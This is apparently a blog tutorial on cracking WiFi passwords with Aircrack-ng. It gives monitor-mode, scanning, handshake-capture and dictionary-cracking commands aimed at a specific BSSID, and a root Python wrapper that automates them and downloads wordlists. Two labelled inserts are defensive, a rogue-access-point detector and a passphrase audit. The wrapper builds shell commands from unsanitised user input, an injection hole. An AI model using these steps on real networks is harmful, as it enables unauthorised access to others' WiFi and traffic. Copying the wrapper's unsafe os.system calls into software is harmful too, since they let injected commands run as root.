Aircrack-ng official site: https://www.aircrack-ng.org/

Aircrack-ng is a tool for cracking WiFi passwords. The idea is: first find the WiFi you want to crack, then kick a device offline and pose as the hotspot so that other devices connect to the fake hotspot and you capture the handshake, and finally run a dictionary against the handshake to recover the password.

Put bluntly: if the password is in the dictionary you get it, and if it isn't there is nothing you can do, so as for how useful this really is……

Installing Aircrack-ng

Kali actually ships with it, but most Linux distributions don't, so we need to install it ourselves.

The simplest way is to install it directly through apt:

```bash
sudo apt update
sudo apt install aircrack-ng -y
```

It prints this for me only because I had already installed it; if you haven't, it goes through the normal apt installation flow.

Adapter setup

I plugged in my own AWUS036H adapter (it shows up as wlan0). On Taobao they go from a few dozen to a few hundred yuan; mine, naturally, was free.

Here is a photo of the actual adapter.

To start using Aircrack-ng you need to put the adapter into monitor mode. Aircrack-ng has a one-shot command for this; we only need to run

```bash
sudo airmon-ng start <adapter name>
```

and monitor mode is enabled. In my case the command I need to type is

```bash
sudo airmon-ng start wlan0
```

(Because I had already started it once, two processes were using the adapter; as the output suggests, run airmon-ng check kill to kill the related processes first, then start it again.)

Once that is done, the adapter name gains a mon suffix, like this:

Scanning for networks

Use airodump-ng <adapter name> to enter scan mode:

```bash
sudo airodump-ng wlan0mon
```

It then starts scanning for nearby WiFi networks; press Q twice to quit the scan.

BSSID: the MAC address of the WiFi network found

PWR: not sure, but not needed (it is the signal level reported by the driver; values closer to 0 mean a stronger signal)

Beacons: not sure, but also not needed (it is the number of beacon frames received from that access point)

#Data, #/s: amount of data (my guess) (captured data frames in total, and per second)

CH: the Channel, i.e. the WiFi channel

MB: not sure, also not needed (the maximum speed the access point supports)

ENC CIPHER: the version of the encryption protocol (ENC is OPN/WEP/WPA/WPA2; CIPHER is CCMP or TKIP)

AUTH: the authentication method (PSK means a password)

ESSID: the WiFi name

We need to note down two things, the BSSID and the CHANNEL, because they are used when capturing the handshake. Once noted, press Q twice to quit the scan.
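An added example that is not part of the original post: besides the live screen, airodump-ng also writes the same table (BSSID, channel, ENC/CIPHER/AUTH, ESSID) to a -01.csv file next to the capture. The script below parses that file and reads it from the defender's side, flagging any access point that advertises your own ESSID from a BSSID you do not own (the "pose as the hotspot" trick from the introduction) and any network still running open or WEP. The CSV column order is what airodump-ng emits as far as I know it; the sample rows, MAC addresses and function names are my own constructed placeholders.

```python
import csv
import io

# Constructed sample (made-up MACs and times) laid out the way airodump-ng writes
# its -01.csv file: an access-point table, a blank line, then a station table.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
5E:E4:2A:0D:4B:75, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 54, WPA2, CCMP, PSK, -40, 120, 0, 0.  0.  0.  0, 9, Raspberry,
AA:BB:CC:00:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 6, 54, WPA2, CCMP, PSK, -72, 30, 0, 0.  0.  0.  0, 9, Raspberry,
AA:BB:CC:00:00:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 1, 54, OPN , , , -60, 45, 0, 0.  0.  0.  0, 7, CoffeeAP,
AA:BB:CC:00:00:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 3, 11, WEP , WEP , , -80, 12, 40, 0.  0.  0.  0, 6, OldCam,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:BE:EF:00:01, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -50, 200, 5E:E4:2A:0D:4B:75, Raspberry
"""


def parse_access_points(text: str) -> list:
    """Return one dict per access point from the first table of an airodump-ng CSV."""
    text = text.replace("\r\n", "\n").strip("\n")
    ap_table = text.split("\n\n", 1)[0]          # the station table follows a blank line
    reader = csv.DictReader(io.StringIO(ap_table), skipinitialspace=True)
    aps = []
    for row in reader:
        # airodump pads fields with spaces; normalise keys and values
        clean = {k.strip(): (v or "").strip() for k, v in row.items() if k is not None}
        aps.append({
            "bssid": clean["BSSID"].upper(),
            "channel": int(clean["channel"]),
            "privacy": clean["Privacy"],
            "cipher": clean["Cipher"],
            "auth": clean["Authentication"],
            "essid": clean["ESSID"],
        })
    return aps


def find_rogue_aps(aps, own_essid, authorised_bssids):
    """APs advertising our ESSID from a BSSID we do not own: evil-twin candidates."""
    allowed = {b.upper() for b in authorised_bssids}
    return [ap for ap in aps if ap["essid"] == own_essid and ap["bssid"] not in allowed]


def find_weak_encryption(aps):
    """APs with no encryption or WEP, which airodump-ng reports as OPN / WEP."""
    return [ap for ap in aps if ap["privacy"] in ("OPN", "WEP")]


if __name__ == "__main__":
    aps = parse_access_points(SAMPLE_CSV)
    for ap in find_rogue_aps(aps, "Raspberry", ["5E:E4:2A:0D:4B:75"]):
        print(f"ROGUE  {ap['bssid']} ch{ap['channel']} {ap['privacy']} {ap['essid']}")
    for ap in find_weak_encryption(aps):
        print(f"WEAK   {ap['bssid']} ch{ap['channel']} {ap['privacy']} {ap['essid']}")
```

Run it against the real file by replacing SAMPLE_CSV with the contents of the captured-01.csv that airodump-ng writes; the authorised BSSID list is the inventory of access points you actually operate.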

Capturing the handshake

Use airodump-ng -w {path} --channel {channel} --bssid {bssid} {netcard} to capture the handshake, where:

path is the path to save the capture file under

channel is the channel, as explained above

bssid is the WiFi's MAC address, also explained above

netcard is the adapter you want to use

Here I simply run the following command to capture the handshake of the WiFi named Raspberry (the Packets folder was created in advance):

```bash
sudo airodump-ng -w ./Packets/captured --channel 11 --bssid 5E:E4:2A:0D:4B:75 wlan0mon
```

The adapter enters capture mode; press Q twice to stop capturing.

Note that during the capture another device must connect to that WiFi at least once (go from not being on the network to joining it), otherwise there is no handshake to record.

When it is done, the files shown in the image appear.

The one we use for cracking is captured-01.cap. As for why there is a 01: aircrack-ng appends a number to the file name so that it never overwrites an existing file with the same name.

Cracking the WiFi password

Use the command aircrack-ng {path} -w {dictionary} to crack the WiFi password, where:

path is the path of the .cap file to crack; here I should fill in ./Packets/captured-01.cap

dictionary is the wordlist to run against the WiFi (dictionaries can be obtained from Code browser - WIFI - Common dictionaries - GamerNoTitle's team (coding.net))

Putting it together, the command I type is (wpa.txt is a dictionary that already exists on my computer):

```bash
sudo aircrack-ng ./Packets/captured-01.cap -w wpa.txt
```

It then starts running through the dictionary and shows the result when it finishes (I didn't run it here, because it is too slow).
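An added example, not from the original post, showing what "running the dictionary" actually costs and why it only ever finds passphrases that are in the list. WPA/WPA2-Personal derives the PMK as PBKDF2-HMAC-SHA1 over the passphrase with the SSID as the salt, 4096 rounds, 32 bytes out; aircrack-ng has to repeat this derivation for every candidate word before it can verify the handshake MIC (the MIC check itself is not shown here). The IEEE 802.11 test vector (passphrase "password", SSID "IEEE") confirms the derivation is right; the wordlist and the function names are my own constructed placeholders, and the audit function is a defender's check of whether a chosen passphrase would fall to such a list.

```python
import hashlib
import hmac
import time

# Constructed wordlist standing in for the wpa.txt dictionary used in the post
WORDLIST = ["12345678", "password", "raspberry", "qwertyuiop"]


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8..63 characters")
    ssid_bytes = ssid.encode()
    if not 0 < len(ssid_bytes) <= 32:
        raise ValueError("SSID must be 1..32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid_bytes, 4096, 32)


def passphrase_in_wordlist(passphrase: str, ssid: str, wordlist) -> bool:
    """Audit: would a dictionary run over `wordlist` recover this passphrase?

    Candidates are compared by derived PMK, which is exactly the per-word work
    a cracker repeats; a passphrase absent from the list can never match.
    """
    target = wpa_psk(passphrase, ssid)
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:
            continue  # outside WPA length limits, never a valid passphrase
        if hmac.compare_digest(wpa_psk(candidate, ssid), target):
            return True
    return False


def derivations_per_second(ssid: str, samples: int = 50) -> float:
    """Rough single-core PBKDF2 rate, to size how long a wordlist would take."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_psk(f"bench{i:08d}", ssid)
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    print("IEEE test vector PSK:", wpa_psk("password", "IEEE").hex())
    print("'password' in list:", passphrase_in_wordlist("password", "Raspberry", WORDLIST))
    print("long phrase in list:",
          passphrase_in_wordlist("correct horse battery staple", "Raspberry", WORDLIST))
    rate = derivations_per_second("Raspberry")
    print(f"~{rate:.0f} PMK/s on this core; a 10M-word list would take ~{1e7 / rate / 3600:.1f} h")
```

Because the SSID is the salt, the same passphrase yields a different PMK on every network, so precomputed tables only help for common SSIDs; a long passphrase that is not in any wordlist is what makes the dictionary run above pointless.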

One-click Python program

Remembering all these commands is annoying, so I wrote a Python program around Aircrack-ng to avoid memorising them. Note: this program only runs on Linux and must be run as root (because most aircrack commands need root privileges).

The program is pasted below; you can also get it from CTF-Scripts/WlanCrack.py at master · GamerNoTitle/CTF-Scripts (github.com). For dictionaries it is linked to my coding repository mentioned above: if you don't provide one, it can download a dictionary from the coding repository.

Python packages to install: requests, tqdm (pprint is part of the standard library)

```python
import os
import sys
import requests
from pprint import pformat
from tqdm import tqdm

ListeningMode = False   # set once airmon-ng has put an adapter in monitor mode
PreviousPath = None     # last capture path, offered as the default when cracking
CardsInfo = ''          # cached ifconfig output, filled by option [0]


def ShowNetCard():
    # List the adapters with ifconfig and return the raw text for later lookups
    output = os.popen('ifconfig')
    data = output.read()
    print(data)
    return data


def StartListenerMode(netcard):
    global ListeningMode
    os.system('airmon-ng check kill')
    os.system(f'airmon-ng start {netcard}')
    ListeningMode = True
    print('Started')


def DumpStatus(NetCard):
    print('Double-press Q to exit. When you are ready, press enter.')
    input()
    os.system(f'airodump-ng {NetCard}')


def CapturePacket(channel: int, bssid: str, netcard: str, path='./captured'):
    print('Double-press Q to exit. When you are ready, press enter.')
    input()
    os.system(f'airodump-ng -w {path} --channel {channel} --bssid {bssid} {netcard}')


def CrackWithDict(path, dictionary):
    os.system('airmon-ng check kill')
    os.system(f'aircrack-ng {path} -w {dictionary}')


def Downloader(url: str, filename: str):
    # Stream the dictionary to disk with a progress bar
    resp = requests.get(url, stream=True)
    resp.raise_for_status()
    total = int(resp.headers.get('content-length', 0))
    with open(filename, 'wb') as file, tqdm(
        desc=filename,
        total=total,
        unit='iB',
        unit_scale=True,
        unit_divisor=1024,
    ) as bar:
        for data in resp.iter_content(chunk_size=1024):
            size = file.write(data)
            bar.update(size)


help_msg = '''{:=^80}
[0] Show netcards
[1] Start listener
[2] Dump wlan status
[3] Capture heartbeat packet
[4] Crack the packet with a dictionary
[9] Install aircrack-ng (If you haven\'t install it on your computer)
[q] Exit
{:=^80}
'''.format(' Aircrack-Ng Script ', ' Made by GamerNoTitle ')

LogoPrint = r''' _ _ _ _ _____ _ _
/\ (_) | | | \ | | / ____| (_) | |
/ \ _ _ __ ___ _ __ __ _ ___| | ________| \| | __ _ | (___ ___ _ __ _ _ __ | |_
/ /\ \ | | '__/ __| '__/ _` |/ __| |/ /______| . ` |/ _` | \___ \ / __| '__| | '_ \| __|
/ ____ \| | | | (__| | | (_| | (__| < | |\ | (_| | ____) | (__| | | | |_) | |_
/_/ \_\_|_| \___|_| \__,_|\___|_|\_\ |_| \_|\__, | |_____/ \___|_| |_| .__/ \__|
__/ | | |
|___/ |_| -- GamerNoTitle '''

if __name__ == '__main__':
    print(LogoPrint)
    if os.geteuid() != 0:
        print('You need to run it as root!')
        sys.exit(1)
    while True:
        print(help_msg)
        Input = input('Please choose an option: ').strip()
        if Input == '0':
            CardsInfo = ShowNetCard()
        elif Input == '1':
            Netcard = input('Please type the netcard\'s name that you wanna use: ')
            if 'wlan' not in Netcard:
                print(f'Unsupported netcard! {Netcard}')
            else:
                StartListenerMode(Netcard)
        elif Input == '2':
            if not ListeningMode:
                print('You need to start the listener first!')
                continue
            Netcard = input('Please type the netcard\'s name that you wanna use: ')
            if not CardsInfo:
                CardsInfo = ShowNetCard()  # option [0] may not have been run yet
            NetCards = CardsInfo.split('\n\n')
            if 'wlan' not in Netcard:
                print(f'Unsupported netcard! {Netcard}')
            elif any(Netcard in card for card in NetCards):
                DumpStatus(Netcard)
            else:
                print(f'Unable to find netcard {Netcard} in {NetCards}')
        elif Input == '3':
            path = input('Please input the path that you want to save the file (e.g: ./captured): ')
            channel = input('Please input the channel that you want to listen to: ')
            bssid = input('Please input the bssid you want to listen to: ')
            netcard = input('Please input the netcard you want to use: ')
            # channel is validated as text before the int() conversion so an
            # empty or non-numeric answer gives a message instead of a traceback
            if not (path and channel.isdigit() and bssid and netcard):
                print('Invalid parameters!')
            else:
                PreviousPath = path
                CapturePacket(channel=int(channel), bssid=bssid, netcard=netcard, path=path)
        elif Input == '4':
            path = input(f'Please input the file you want to crack (Default for the previous file {PreviousPath}): ')
            if path == '':
                path = PreviousPath
            if not path:
                print('No capture file given and no previous capture to fall back on!')
                continue
            dictionary = input('Please input the dictionary that you want to use to crack: ')
            if dictionary == '':
                print('You haven\'t specified a dictionary to crack the packet! Do you need some dictionaries? The available dictionaries are listed below: ')
                dictionaries = requests.get(
                    'https://gamernotitle.coding.net/p/Dictionarys/d/WIFI/git/raw/master/metadata.json?download=true').json()
                print(pformat(dictionaries))
                option = input('Please input the name of the dictionary you want to use: ')
                if option not in dictionaries.get('data', {}):
                    print('You need to specify one of the listed dictionaries to crack the packet!')
                    continue
                Downloader(dictionaries['data'][option]['link'], f'./{option}.txt')
                dictionary = f'{option}.txt'
            print(f'Start cracking {path} with dictionary {dictionary}')
            CrackWithDict(path, dictionary)
        elif Input == '9':
            os.system('apt update')
            os.system('apt install aircrack-ng -y')
        elif Input == 'q':
            sys.exit(0)
```